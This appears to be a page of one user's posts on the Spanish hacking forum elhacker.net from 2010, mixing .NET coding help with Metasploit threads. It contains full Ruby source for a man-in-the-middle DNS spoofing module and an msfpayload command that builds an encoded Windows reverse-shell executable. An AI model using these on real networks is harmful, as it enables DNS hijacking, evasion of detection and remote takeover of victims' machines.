elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 [342] 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 ... 368
3411  Seguridad Informática / Hacking / Re: Como podria hacer esto?? en: 26 Febrero 2010, 19:19 pm
...un software que necesita un hardware detras bestial...
WTF!
3412  Programación / .NET (C#, VB.NET, ASP) / [Aspx.NET] Resultado consulta SQL en: 26 Febrero 2010, 03:22 am
Bueno, tengo una pregunta, que hace rato me anda rondando en la cabeza. Miren, supongamos que tenemos una consulta así:
Código
  1. SELECT [strIdentificacion], [strNombre], [strApellido]
  2.  FROM [Knowledge].[dbo].[tblUsuario]

Ahora cuales son las posibles opciones para ejecutar y recuperar el resultado de la consulta dentro de Aspx.NET

Opción 1:
Código
  1. strCmd = New SqlCommand(strSql, strcnn)
  2.  
  3. strDr = strCmd.ExecuteReader
  4. If strSqlDataReader.Read Then
  5.   txtIdentificacion.Text = strSqlDataReader("strIdentificacion").ToString()
  6.   txtNombre.Text = strSqlDataReader("strNombre").ToString()
  7.   txtApellido.Text = strSqlDataReader("strApellido").ToString()
  8. End If
3413  Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit en: 24 Febrero 2010, 22:01 pm
me referia a que es una tonteria...  MiTM no es una vulnerabilidad...
Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...

Tal vez si los paquetes fuesen "Archivos", se modificarian por algun PAYLOAD



PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica.
Código
  1. ##
  2. # $Id: fakedns.rb 5540 2008-06-25 23:04:19Z hdm $
  3. ##
  4.  
  5. ##
  6. # This file is part of the Metasploit Framework and may be subject to
  7. # redistribution and commercial restrictions. Please see the Metasploit
  8. # Framework web site for more information on licensing and terms of use.
  9. # http://metasploit.com/projects/Framework/
  10. ##
  11.  
  12.  
  13. require 'msf/core'
  14. require 'resolv'
  15.  
  16. module Msf
  17.  
  18. class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary
  19.  
  20. include Auxiliary::Report
  21.  
  22. def initialize
  23. super(
  24. 'Name'        => 'MITM DNS Service',
  25. 'Version'     => '$Revision: 5540 $',
  26. 'Description'    => %q{
  27.  This hack of the metasploit fakedns.rb serves as a sort
  28.  of MITM DNS server.  Requests are passed through to a real
  29.  DNS server, and the responses are modified before being
  30.  returned to the client, if they match regular expressions
  31.  set in FILENAME.
  32. },
  33. 'Author'      => ['ddz', 'hdm', 'Wesley McGrew <wesley@mcgrewsecurity.com>'],
  34. 'License'     => MSF_LICENSE,
  35. 'Actions'     =>
  36. [
  37. [ 'Service' ]
  38. ],
  39. 'PassiveActions' =>
  40. [
  41. 'Service'
  42. ],
  43. 'DefaultAction'  => 'Service'
  44. )
  45.  
  46. register_options(
  47. [
  48. OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
  49. OptPort.new('SRVPORT',      [ true, "The local port to listen on.", 53 ]),
  50. # W: Added in an option for a set of filters, took out the catchall TARGETHOST
  51. OptAddress.new('REALDNS', [true,"Ask this server for answers",nil]),
  52. OptString.new('FILENAME', [true,"File of ip,regex for filtering responses",nil])
  53. ], self.class)
  54. end
  55.  
  56.  
  57. def run
  58.  
  59. begin
  60.  fp = File.new(datastore['FILENAME'])
  61. rescue
  62.  print_status "Could not open #{datastore['FILENAME']} for reading.  Quitting."
  63.    return
  64. end
  65. mod_entries = []
  66. while !fp.eof?
  67.    entry = fp.gets().chomp().split(',')
  68.    mod_entries.push([entry[0],Regexp.new(entry[1])])
  69.  end
  70.  
  71.  
  72. @port = datastore['SRVPORT'].to_i
  73.  
  74.    # MacOS X workaround
  75.    ::Socket.do_not_reverse_lookup = true
  76.  
  77.    @sock = ::UDPSocket.new()
  78.    @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
  79.    @sock.bind(datastore['SRVHOST'], @port)
  80.    @run = true
  81.  
  82. Thread.new {
  83. # Wrap in exception handler
  84.  begin
  85.  
  86.        while @run
  87.          packet, addr = @sock.recvfrom(65535)
  88.          if (packet.length == 0)
  89.              break
  90.          end
  91.  
  92.          request = Resolv::DNS::Message.decode(packet)
  93.  
  94.  
  95.          # W: Go ahead and send it to the real DNS server and
  96.          #    get the response
  97.          sock2 = ::UDPSocket.new()
  98.          sock2.send(packet, 0, datastore['REALDNS'], 53) #datastore['REALDNS'], 53)
  99.          packet2, addr2 = sock2.recvfrom(65535)
  100.          sock2.close()
  101.  
  102.  
  103.          real_response = Resolv::DNS::Message.decode(packet2)
  104.          fake_response = Resolv::DNS::Message.new()
  105.  
  106.          fake_response.qr = 1 # Recursion desired
  107.          fake_response.ra = 1 # Recursion available
  108.          fake_response.id = real_response.id
  109.  
  110.          real_response.each_question { |name, typeclass|
  111.            fake_response.add_question(name, typeclass)
  112.          }
  113.  
  114.          real_response.each_answer { |name, ttl, data|
  115.            replaced = false
  116.            mod_entries.each { |e|
  117.              if name.to_s =~ e[1]
  118.                case data.to_s
  119.                when /IN::A/
  120.                  data = Resolv::DNS::Resource::IN::A.new(e[0])
  121.                  replaced = true
  122.                when /IN::MX/
  123.                  data = Resolv::DNS::Resource::IN::MX.new(10,Resolv::DNS::Name.create(e[0]))
  124.                  replaced = true
  125.                when /IN::NS/
  126.                  data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
  127.                  replaced = true
  128.                when /IN::PTR/
  129.                  # Do nothing
  130.                  replaced = true
  131.                else
  132.                  # Do nothing
  133.                  replaced = true
  134.                end
  135.              end
  136.              break if replaced
  137.            }
  138.            fake_response.add_answer(name,ttl,data)
  139.          }
  140.  
  141.          real_response.each_authority { |name, ttl, data|
  142.            mod_entries.each { |e|
  143.              if name.to_s =~ e[1]
  144.                data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
  145.                break
  146.              end
  147.            }
  148.            fake_response.add_authority(name,ttl,data)
  149.          }
  150.  
  151.          response_packet = fake_response.encode()
  152.  
  153.          @sock.send(response_packet, 0, addr[3], addr[1])
  154.        end
  155.  
  156. # Make sure the socket gets closed on exit
  157.  rescue ::Exception => e
  158.  print_error("fakedns: #{e.class} #{e} #{e.backtrace}")
  159.  ensure
  160.  @sock.close
  161.  end
  162.  
  163. }
  164.  
  165. end
  166.  
  167. end
  168. end
3414  Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit en: 24 Febrero 2010, 21:22 pm
que opinas Shell Root??
:silbar:



Bueno, xD, ando de nuevo retirado, ocupaciones como "Desarrollador de Software", quitan demasiado tiempo. Así, solo diré...

"Una vulnerabilidad es tan limitada como tu quieras que sea"

y... [Ettercap] And [Metasploit], hacen una gran pareja! :D
3415  Foros Generales / Foro Libre / Re: ¿Que estas escuchando? en: 24 Febrero 2010, 07:13 am
Polvo en el Viendo de Kansas

3416  Programación / .NET (C#, VB.NET, ASP) / Re: Richtextbox en C# y VB.NET en: 24 Febrero 2010, 06:13 am
Código
  1. Option Explicit On
  2. Option Strict On
  3.  
  4. Imports System.Text.RegularExpressions
  5.  
  6. Public Class Form1
  7.  
  8.    Private Sub Buscar_Coincidencia( _
  9.        ByVal pattern As String, _
  10.        ByVal RichTextBox As RichTextBox, _
  11.        ByVal cColor As Color, _
  12.        ByVal BackColor As Color)
  13.  
  14.  
  15.        Dim Resultados As MatchCollection
  16.        Dim Palabra As Match
  17.  
  18.        Try
  19.            ' PAsar el pattern e indicar que ignore las mayúsculas y minúsculas al mosmento de buscar
  20.            Dim obj_Expresion As New Regex(pattern.ToString, RegexOptions.IgnoreCase)
  21.  
  22.            ' Ejecutar el método Matches para buscar la cadena en el texto del control
  23.            ' y retornar un MatchCollection con los resultados
  24.            Resultados = obj_Expresion.Matches(RichTextBox.Text)
  25.  
  26.            ' quitar el coloreado anterior
  27.            With RichTextBox
  28.                .SelectAll()
  29.                .SelectionColor = Color.Black
  30.            End With
  31.  
  32.            ' Si se encontraron coincidencias recorre las colección  
  33.            For Each Palabra In Resultados
  34.                With RichTextBox
  35.                    .SelectionStart = Palabra.Index ' comienzo de la selección
  36.                    .SelectionLength = Palabra.Length ' longitud de la cadena a seleccionar
  37.                    .SelectionColor = cColor ' color de la selección
  38.                    .SelectionBackColor = BackColor
  39.                    Debug.Print(Palabra.Value)
  40.                End With
  41.            Next Palabra
  42.  
  43.        Catch ex As Exception
  44.            MsgBox(ex.Message.ToString)
  45.        End Try
  46.  
  47.    End Sub
  48.  
  49.    Private Sub Button1_Click( _
  50.        ByVal sender As System.Object, _
  51.        ByVal e As System.EventArgs) Handles Button1.Click
  52.        ' pasar el pattern, el Richtext, y los colores para el resalte
  53.        Buscar_Coincidencia(TextBox1.Text, RichTextBox1, Color.Blue, Color.Yellow)
  54.  
  55.    End Sub
  56. End Class
Fuente: :http://www.recursosvisualbasic.com.ar/htm/vb-net/9-richtextobx-highlight-color-en-vb-net.htm
3417  Programación / .NET (C#, VB.NET, ASP) / Re: Bloquear fichero para que nadie más acceda a el en: 23 Febrero 2010, 19:04 pm
FileStream.Lock (Método): Evita que otros procesos cambien FileStream permitiendo al mismo tiempo el acceso de lectura.



Citar
Puedes renombrerlo,cambiar ubicación y extención.
Name "c:\x.txt" As "c:\Windows\System\xfx.dll"
Fuente: :http://www.canalvisualbasic.net/foro/visual-basic-6-0/bloquear-archivos-para-que-no-puedan-ser-leidos-5204/
3418  Seguridad Informática / Hacking / Re: Encoders de Metasploit en: 23 Febrero 2010, 19:00 pm
Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable
Código:
shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe
3419  Seguridad Informática / Hacking / Re: metasploit para vista en: 23 Febrero 2010, 18:58 pm
El Nessus dá la referencia de la vulnerabilidad, intentad realizando un Search Nombre_Vulnerabilidad. Y con respecto tu primera duda, mirad que no pudó encontrar el Lenguaje del Sistema.
Código:
Fingerprint: Windows Vista Home Premium Service Pack 2 - lang:Unknown

Mirad http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
3420  Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit en: 23 Febrero 2010, 18:55 pm
Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!



togueter, WTF!
Páginas: 1 ... 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 [342] 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 ... 368
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines